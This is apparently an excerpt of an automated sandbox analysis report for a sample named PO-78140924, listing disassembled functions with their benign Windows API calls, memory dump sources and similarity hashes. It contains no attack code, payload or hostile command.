                                                • String ID:
                                                • API String ID: 1296646539-0
                                                • Opcode ID: 7e4057813b34478bbf884bafb473e97212464df77a5f039690d1672d14656259
                                                • Instruction ID: ef1b5c3e77a7dda92956d0148a62df4dd3708a162390811d2825562457c95599
                                                • Opcode Fuzzy Hash: 7e4057813b34478bbf884bafb473e97212464df77a5f039690d1672d14656259
                                                • Instruction Fuzzy Hash: 85B13679A0024ADBDF54CFA8C5807EEB7F1FF08310F148569ED599B250EB70AA91CB64
                                                Function 0006F1FE Relevance: 9.2, APIs: 6, Instructions: 159COMMON
                                                Download Yara Rule
                                                APIs
                                                • VariantInit.OLEAUT32(?), ref: 0006F218
                                                • VariantClear.OLEAUT32(00000013), ref: 0006F28A
                                                • VariantClear.OLEAUT32(00000000), ref: 0006F2E5
                                                • _memmove.LIBCMT ref: 0006F30F
                                                • VariantClear.OLEAUT32(?), ref: 0006F35C
                                                • VariantChangeType.OLEAUT32(?,?,00000000,00000013), ref: 0006F38A
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2043823400.0000000000011000.00000040.00000001.01000000.00000003.sdmp, Offset: 00010000, based on PE: true
                                                • Associated: 00000000.00000002.2043798487.0000000000010000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2043823400.00000000000C4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2043823400.00000000000CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2043823400.00000000000DD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2043823400.0000000000194000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2044008442.000000000019A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2044024017.000000000019B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_10000_PO-78140924.jbxd
                                                Similarity
                                                • API ID: Variant$Clear$ChangeInitType_memmove
                                                • String ID:
                                                • API String ID: 1101466143-0
                                                • Opcode ID: 815d77393f05553393224dbb05de87f8aa4c0b0d95ced7384a334d2a86611d2d
                                                • Instruction ID: 029d4546dc4f551ea8004783a9c5c80901bf53248308dd99fa8daac0509891e9
                                                • Opcode Fuzzy Hash: 815d77393f05553393224dbb05de87f8aa4c0b0d95ced7384a334d2a86611d2d
                                                • Instruction Fuzzy Hash: 66514CB5A0021AAFDB14CF58D884AAAB7F9FF4C314B158569E959DB301D334EA11CFA0
                                                Function 00011765 Relevance: 9.1, APIs: 6, Instructions: 113COMMON
                                                Download Yara Rule
                                                APIs
                                                  • Part of subcall function 00012612: GetWindowLongW.USER32(?,000000EB), ref: 00012623
                                                • BeginPaint.USER32(?,?,?), ref: 0001179A
                                                • GetWindowRect.USER32(?,?), ref: 000117FE
                                                • ScreenToClient.USER32(?,?), ref: 0001181B
                                                • SetViewportOrgEx.GDI32(00000000,?,?,00000000), ref: 0001182C
                                                • EndPaint.USER32(?,?,?,?,?), ref: 00011876
                                                • Rectangle.GDI32(00000000,00000000,00000000,?,?), ref: 0004B9FB
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2043823400.0000000000011000.00000040.00000001.01000000.00000003.sdmp, Offset: 00010000, based on PE: true
                                                • Associated: 00000000.00000002.2043798487.0000000000010000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2043823400.00000000000C4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2043823400.00000000000CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2043823400.00000000000DD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2043823400.0000000000194000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2044008442.000000000019A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2044024017.000000000019B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_10000_PO-78140924.jbxd
                                                Similarity
                                                • API ID: PaintWindow$BeginClientLongRectRectangleScreenViewport
                                                • String ID:
                                                • API String ID: 2592858361-0
                                                • Opcode ID: 20871b969f81462d541088666b3241eae758950f46bb3e1f2d7d9e1ef03ce55f
                                                • Instruction ID: 1a24acbdfee68c3c0e670f27ba5b40863af0d4c038a4b7d717c6e7a161220332
                                                • Opcode Fuzzy Hash: 20871b969f81462d541088666b3241eae758950f46bb3e1f2d7d9e1ef03ce55f
                                                • Instruction Fuzzy Hash: EC41A0701047019FD710DF25DC84FFA7BE8FB49725F14462AFAA4872A2CB349885DB61
                                                Function 0009B6D2 Relevance: 9.1, APIs: 6, Instructions: 109windowCOMMON
                                                Download Yara Rule
                                                APIs
                                                • ShowWindow.USER32(000D57B0,00000000,01463B38,?,?,000D57B0,?,0009B5DC,?,?), ref: 0009B746
                                                • EnableWindow.USER32(?,00000000), ref: 0009B76A
                                                • ShowWindow.USER32(000D57B0,00000000,01463B38,?,?,000D57B0,?,0009B5DC,?,?), ref: 0009B7CA
                                                • ShowWindow.USER32(?,00000004,?,0009B5DC,?,?), ref: 0009B7DC
                                                • EnableWindow.USER32(?,00000001), ref: 0009B800
                                                • SendMessageW.USER32(?,0000130C,?,00000000), ref: 0009B823
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2043823400.0000000000011000.00000040.00000001.01000000.00000003.sdmp, Offset: 00010000, based on PE: true
                                                • Associated: 00000000.00000002.2043798487.0000000000010000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2043823400.00000000000C4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2043823400.00000000000CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2043823400.00000000000DD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2043823400.0000000000194000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2044008442.000000000019A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2044024017.000000000019B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_10000_PO-78140924.jbxd
                                                Similarity
                                                • API ID: Window$Show$Enable$MessageSend
                                                • String ID:
                                                • API String ID: 642888154-0
                                                • Opcode ID: fa9a35112ce86356d41ee1fc6e4e79da1225aeee15cdf1e669acd033eeb80df7
                                                • Instruction ID: 17373f6d1fa50e79b0b68a89e99b9a5dea20168eed9fd5d6100fe3da9e642f0e
                                                • Opcode Fuzzy Hash: fa9a35112ce86356d41ee1fc6e4e79da1225aeee15cdf1e669acd033eeb80df7
                                                • Instruction Fuzzy Hash: 9341A134608141EFDF61CF64D5C9BE1BBE1FB49320F1842B9E9488F2A2CB31A845DB50
                                                Function 00049AD8 Relevance: 9.1, APIs: 6, Instructions: 69COMMONLIBRARYCODE
                                                Download Yara Rule
                                                APIs
                                                • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000000,00000000,00000000,?,00000000,?,?,000488B4,?,?), ref: 00049AF4
                                                • __calloc_crt.LIBCMT ref: 00049B03
                                                • WideCharToMultiByte.KERNEL32(00000000,00000000,0145A0C0,000000FF,00000000,00000000,00000000,00000000,?,?,000488B4,?,?,?,0004414C,000AE500), ref: 00049B1F
                                                • ___crtsetenv.LIBCMT ref: 00049B2E
                                                • _free.LIBCMT ref: 00049B41
                                                • _free.LIBCMT ref: 00049B5C
                                                  • Part of subcall function 00032ED5: RtlFreeHeap.NTDLL(00000000,00000000,?,00039BA4,00000000,?,?,?,00000000,?,00039E55,00000018,000CA1A8,00000008,00039DA2,?), ref: 00032EE9
                                                  • Part of subcall function 00032ED5: GetLastError.KERNEL32(00000000,?,00039BA4,00000000,?,?,?,00000000,?,00039E55,00000018,000CA1A8,00000008,00039DA2,?), ref: 00032EFB
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2043823400.0000000000011000.00000040.00000001.01000000.00000003.sdmp, Offset: 00010000, based on PE: true
                                                • Associated: 00000000.00000002.2043798487.0000000000010000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2043823400.00000000000C4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2043823400.00000000000CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2043823400.00000000000DD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2043823400.0000000000194000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2044008442.000000000019A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2044024017.000000000019B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_10000_PO-78140924.jbxd
                                                Similarity
                                                • API ID: ByteCharMultiWide_free$ErrorFreeHeapLast___crtsetenv__calloc_crt
                                                • String ID:
                                                • API String ID: 3554878821-0
                                                • Opcode ID: e8165aacdf51356e832ffaa90ee9cbe82e9e2ab71cec88ff153843a841aa55f9
                                                • Instruction ID: 5191aacb733bea504dc276fcc60bbccd9d4368eea46f3d2cc4971089f9a73676
                                                • Opcode Fuzzy Hash: e8165aacdf51356e832ffaa90ee9cbe82e9e2ab71cec88ff153843a841aa55f9
                                                • Instruction Fuzzy Hash: 97118671505105BAEB219A56AD05E6BBBBCDBC3B30F30427EF410D21D1DB719D00A665
                                                Function 0009BF14 Relevance: 9.0, APIs: 6, Instructions: 49COMMON
                                                Download Yara Rule
                                                APIs
                                                  • Part of subcall function 000112F3: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000), ref: 0001134D
                                                  • Part of subcall function 000112F3: SelectObject.GDI32(?,00000000), ref: 0001135C
                                                  • Part of subcall function 000112F3: BeginPath.GDI32(?), ref: 00011373
                                                  • Part of subcall function 000112F3: SelectObject.GDI32(?,00000000), ref: 0001139C
                                                • MoveToEx.GDI32(00000000,-00000002,?,00000000), ref: 0009BF3E
                                                • LineTo.GDI32(00000000,00000003,?), ref: 0009BF52
                                                • MoveToEx.GDI32(00000000,00000000,?,00000000), ref: 0009BF60
                                                • LineTo.GDI32(00000000,00000000,?), ref: 0009BF70
                                                • EndPath.GDI32(00000000), ref: 0009BF80
                                                • StrokePath.GDI32(00000000), ref: 0009BF90
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2043823400.0000000000011000.00000040.00000001.01000000.00000003.sdmp, Offset: 00010000, based on PE: true
                                                • Associated: 00000000.00000002.2043798487.0000000000010000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2043823400.00000000000C4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2043823400.00000000000CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2043823400.00000000000DD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2043823400.0000000000194000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2044008442.000000000019A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2044024017.000000000019B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_10000_PO-78140924.jbxd
                                                Similarity
                                                • API ID: Path$LineMoveObjectSelect$BeginCreateStroke
                                                • String ID:
                                                • API String ID: 43455801-0
                                                • Opcode ID: 06bbf1f82a2303e771c20b151d5aa1d09614c10b3a2e4fecab38857b80496500
                                                • Instruction ID: 68ddb0f915a7e33938941f9f886a556d8035e69e4455ea3cd628a05a46a093a8
                                                • Opcode Fuzzy Hash: 06bbf1f82a2303e771c20b151d5aa1d09614c10b3a2e4fecab38857b80496500
                                                • Instruction Fuzzy Hash: 1011097640410DBFEF119F90DC88EEA7FACFB08364F048022BE189A161C7759D95EBA0
                                                Function 000302E2 Relevance: 9.0, APIs: 6, Instructions: 44keyboardCOMMON
                                                Download Yara Rule
                                                APIs
                                                • MapVirtualKeyW.USER32(0000005B,00000000), ref: 00030313
                                                • MapVirtualKeyW.USER32(00000010,00000000), ref: 0003031B
                                                • MapVirtualKeyW.USER32(000000A0,00000000), ref: 00030326
                                                • MapVirtualKeyW.USER32(000000A1,00000000), ref: 00030331
                                                • MapVirtualKeyW.USER32(00000011,00000000), ref: 00030339
                                                • MapVirtualKeyW.USER32(00000012,00000000), ref: 00030341
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2043823400.0000000000011000.00000040.00000001.01000000.00000003.sdmp, Offset: 00010000, based on PE: true
                                                • Associated: 00000000.00000002.2043798487.0000000000010000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2043823400.00000000000C4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2043823400.00000000000CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2043823400.00000000000DD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2043823400.0000000000194000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2044008442.000000000019A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2044024017.000000000019B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_10000_PO-78140924.jbxd
                                                Similarity
                                                • API ID: Virtual
                                                • String ID:
                                                • API String ID: 4278518827-0
                                                • Opcode ID: 0dad2e6babf611f86d07ede125af8e7ea89941ced11d57517100bf17d7530e7e
                                                • Instruction ID: f2e52019e6262531d90098d08bdecd7fff68bc71b59485ae70c5de1303e18bcc
                                                • Opcode Fuzzy Hash: 0dad2e6babf611f86d07ede125af8e7ea89941ced11d57517100bf17d7530e7e
                                                • Instruction Fuzzy Hash: E5016CB090175A7DE3008F5A8C85B52FFB8FF19354F00411BA15C87941C7F5A864CBE5
                                                Function 00072A4B Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 114windowCOMMON
                                                Download Yara Rule
                                                APIs
                                                • _memset.LIBCMT ref: 00072AB8
                                                • GetMenuItemInfoW.USER32(00000004,00000000,00000000,?), ref: 00072AD4
                                                • DeleteMenu.USER32(?,00000007,00000000), ref: 00072B1A
                                                • DeleteMenu.USER32(?,00000000,00000000,?,00000000,00000000,000D5890,00000000), ref: 00072B63
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2043823400.0000000000011000.00000040.00000001.01000000.00000003.sdmp, Offset: 00010000, based on PE: true
                                                • Associated: 00000000.00000002.2043798487.0000000000010000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2043823400.00000000000C4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2043823400.00000000000CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2043823400.00000000000DD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2043823400.0000000000194000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2044008442.000000000019A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2044024017.000000000019B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_10000_PO-78140924.jbxd
                                                Similarity
                                                • API ID: Menu$Delete$InfoItem_memset
                                                • String ID: 0
                                                • API String ID: 1173514356-4108050209
                                                • Opcode ID: 70e5b7ee7c82193e8ac9869cd767ed5b35d3fdc7b15014978723867dedafc5c8
                                                • Instruction ID: 711fa743f611da6bb071b5ee04add14fa10d79cde79298ae8100a8d23fe0339a
                                                • Opcode Fuzzy Hash: 70e5b7ee7c82193e8ac9869cd767ed5b35d3fdc7b15014978723867dedafc5c8
                                                • Instruction Fuzzy Hash: 2241B4706043429FD720DF24C885B6AB7E9BF84320F10866EF5A997292D774E904CB56
                                                Function 00047C48 Relevance: 7.6, APIs: 5, Instructions: 97COMMON
                                                Download Yara Rule
                                                APIs
                                                • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 00047C6F
                                                • _memset.LIBCMT ref: 00047C9A
                                                • WideCharToMultiByte.KERNEL32(?,00000000,?,00000001,?,?,00000000,?,?), ref: 00047CF7
                                                • GetLastError.KERNEL32(?,?,00000000,?,?), ref: 00047D13
                                                • _memset.LIBCMT ref: 00047D29
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2043823400.0000000000011000.00000040.00000001.01000000.00000003.sdmp, Offset: 00010000, based on PE: true
                                                • Associated: 00000000.00000002.2043798487.0000000000010000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2043823400.00000000000C4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2043823400.00000000000CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2043823400.00000000000DD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2043823400.0000000000194000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2044008442.000000000019A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2044024017.000000000019B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_10000_PO-78140924.jbxd
                                                Similarity
                                                • API ID: Locale_memset$ByteCharErrorLastMultiUpdateUpdate::_Wide
                                                • String ID:
                                                • API String ID: 742067911-0
                                                • Opcode ID: 2af82b7b32d7431273b3043c7a3cd0ffc89dedabf7e8ad7d488e9d53ba12c444
                                                • Instruction ID: 207ce28cec79070fb27f2ab3b4791841da4d1009201af5cd9989ce31588a962c
                                                • Opcode Fuzzy Hash: 2af82b7b32d7431273b3043c7a3cd0ffc89dedabf7e8ad7d488e9d53ba12c444
                                                • Instruction Fuzzy Hash: 9A31D4B16082169FDB329F55D8C5ABE3BA8EF41721F0441BDF81D4B292DB349D00C7A5
                                                Function 000112F3 Relevance: 7.6, APIs: 5, Instructions: 67COMMON
                                                Download Yara Rule
                                                APIs
                                                • ExtCreatePen.GDI32(?,?,00000000,00000000,00000000), ref: 0001134D
                                                • SelectObject.GDI32(?,00000000), ref: 0001135C
                                                • BeginPath.GDI32(?), ref: 00011373
                                                • SelectObject.GDI32(?,00000000), ref: 0001139C
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2043823400.0000000000011000.00000040.00000001.01000000.00000003.sdmp, Offset: 00010000, based on PE: true
                                                • Associated: 00000000.00000002.2043798487.0000000000010000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2043823400.00000000000C4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2043823400.00000000000CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2043823400.00000000000DD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2043823400.0000000000194000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2044008442.000000000019A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2044024017.000000000019B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_10000_PO-78140924.jbxd
                                                Similarity
                                                • API ID: ObjectSelect$BeginCreatePath
                                                • String ID:
                                                • API String ID: 3225163088-0
                                                • Opcode ID: a34a7594ef1de615cc0ddf4a8d8443008a7ca1dd7de374e0f4edfd5c49e2389a
                                                • Instruction ID: e932811c7722d6c94f8e6a07f8d1c795ac5349b43f22859c5ac655f179f308d3
                                                • Opcode Fuzzy Hash: a34a7594ef1de615cc0ddf4a8d8443008a7ca1dd7de374e0f4edfd5c49e2389a
                                                • Instruction Fuzzy Hash: 87215170801609EBEB109F15DC047E97BE8FB04312F244227FD20A61A4DB799991EFA0
                                                Function 000113B0 Relevance: 7.5, APIs: 5, Instructions: 29COMMON
                                                Download Yara Rule
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2043823400.0000000000011000.00000040.00000001.01000000.00000003.sdmp, Offset: 00010000, based on PE: true
                                                • Associated: 00000000.00000002.2043798487.0000000000010000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2043823400.00000000000C4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2043823400.00000000000CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2043823400.00000000000DD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2043823400.0000000000194000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2044008442.000000000019A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2044024017.000000000019B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_10000_PO-78140924.jbxd
                                                Similarity
                                                • API ID: Path$ObjectStroke$DeleteFillSelect
                                                • String ID:
                                                • API String ID: 2625713937-0
                                                • Opcode ID: a017a1884bf36da767c4b1d4f9a6bab9645dcaf77c237620d6d67e706b63f5aa
                                                • Instruction ID: ff8ecbcf95606b4620c1a64684ddf14f05ceae81e720492b93d6e47a2770c66f
                                                • Opcode Fuzzy Hash: a017a1884bf36da767c4b1d4f9a6bab9645dcaf77c237620d6d67e706b63f5aa
                                                • Instruction Fuzzy Hash: 3EF01D30001709EBEB155F16EC4C7A83BE8B740326F188226ED69980F1CB3845D5EF60
                                                Function 0003518D Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 180COMMON
                                                Download Yara Rule
                                                APIs
                                                • __startOneArgErrorHandling.LIBCMT ref: 0003521D
                                                  • Part of subcall function 00040270: __87except.LIBCMT ref: 000402AB
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2043823400.0000000000011000.00000040.00000001.01000000.00000003.sdmp, Offset: 00010000, based on PE: true
                                                • Associated: 00000000.00000002.2043798487.0000000000010000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2043823400.00000000000C4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2043823400.00000000000CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2043823400.00000000000DD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2043823400.0000000000194000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2044008442.000000000019A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2044024017.000000000019B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_10000_PO-78140924.jbxd
                                                Similarity
                                                • API ID: ErrorHandling__87except__start
                                                • String ID: pow
                                                • API String ID: 2905807303-2276729525
                                                • Opcode ID: 69671b888bb28a018c6e4383145c05bba1309d8f90a4db59e5a67949ee176631
                                                • Instruction ID: 375321f2a09c1aaa8412cc42d7e8514e7d2262a5aee9df17e2e94766c22929cf
                                                • Opcode Fuzzy Hash: 69671b888bb28a018c6e4383145c05bba1309d8f90a4db59e5a67949ee176631
                                                • Instruction Fuzzy Hash: FA51ACF1A0CA0197DB62BB14CD013BF2BDCDB42312F208D68E595521F6EF388DC49A4A
                                                Function 0003017B Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 163COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2043823400.0000000000011000.00000040.00000001.01000000.00000003.sdmp, Offset: 00010000, based on PE: true
                                                • Associated: 00000000.00000002.2043798487.0000000000010000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2043823400.00000000000C4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2043823400.00000000000CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2043823400.00000000000DD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2043823400.0000000000194000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2044008442.000000000019A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2044024017.000000000019B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_10000_PO-78140924.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: #$+
                                                • API String ID: 0-2552117581
                                                • Opcode ID: f2ee9bad5a3fe95a5a094423e6829a015b40009ad9cca0c3f26cc67b680c14cb
                                                • Instruction ID: 916f7231f6eb1bdc2ee468977118776f0f4a2e99fa29c6676ac3b819b1bbc30a
                                                • Opcode Fuzzy Hash: f2ee9bad5a3fe95a5a094423e6829a015b40009ad9cca0c3f26cc67b680c14cb
                                                • Instruction Fuzzy Hash: 34512F351062469FDF26DF28C894AFABBF9EF19310F184055EC919B2A2D7349D82CB61
                                                Function 000262F2 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 141COMMON
                                                Download Yara Rule
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2043823400.0000000000011000.00000040.00000001.01000000.00000003.sdmp, Offset: 00010000, based on PE: true
                                                • Associated: 00000000.00000002.2043798487.0000000000010000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2043823400.00000000000C4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2043823400.00000000000CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2043823400.00000000000DD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2043823400.0000000000194000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2044008442.000000000019A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2044024017.000000000019B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_10000_PO-78140924.jbxd
                                                Similarity
                                                • API ID: _memset$_memmove
                                                • String ID: ERCP
                                                • API String ID: 2532777613-1384759551
                                                • Opcode ID: fae1523cf32b1f600ff4205d6f4dacc2f0e5312732946234180ecee30b08d74b
                                                • Instruction ID: d724531d88be3fd9139c2b61eb3fcec37b6e31c9aec117846dfd665eea7b4a96
                                                • Opcode Fuzzy Hash: fae1523cf32b1f600ff4205d6f4dacc2f0e5312732946234180ecee30b08d74b
                                                • Instruction Fuzzy Hash: 7F51C171900319DFDB24DF65D885BEAB7F8EF04314F20856EE48ACB241E775AA84CB80
                                                Function 00083AFF Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 84COMMON
                                                Download Yara Rule
                                                APIs
                                                • __snwprintf.LIBCMT ref: 00083B7C
                                                  • Part of subcall function 00017F41: _memmove.LIBCMT ref: 00017F82
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2043823400.0000000000011000.00000040.00000001.01000000.00000003.sdmp, Offset: 00010000, based on PE: true
                                                • Associated: 00000000.00000002.2043798487.0000000000010000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2043823400.00000000000C4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2043823400.00000000000CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2043823400.00000000000DD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2043823400.0000000000194000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2044008442.000000000019A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2044024017.000000000019B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_10000_PO-78140924.jbxd
                                                Similarity
                                                • API ID: __snwprintf_memmove
                                                • String ID: , $$AUTOITCALLVARIABLE%d$%
                                                • API String ID: 3506404897-809637302
                                                • Opcode ID: d2d9b743570eaae4d2102feb895e16e8a8ebf32a731921e749531471ea048993
                                                • Instruction ID: 025987c1acc3028baaf95c29d504551b8687d8805a5ec45c9d78513a22d3fb8b
                                                • Opcode Fuzzy Hash: d2d9b743570eaae4d2102feb895e16e8a8ebf32a731921e749531471ea048993
                                                • Instruction Fuzzy Hash: 56214171600219ABCF14EF64CC92EEE77B9BF44700F4444A9F945AB182DB70EE45CBA1
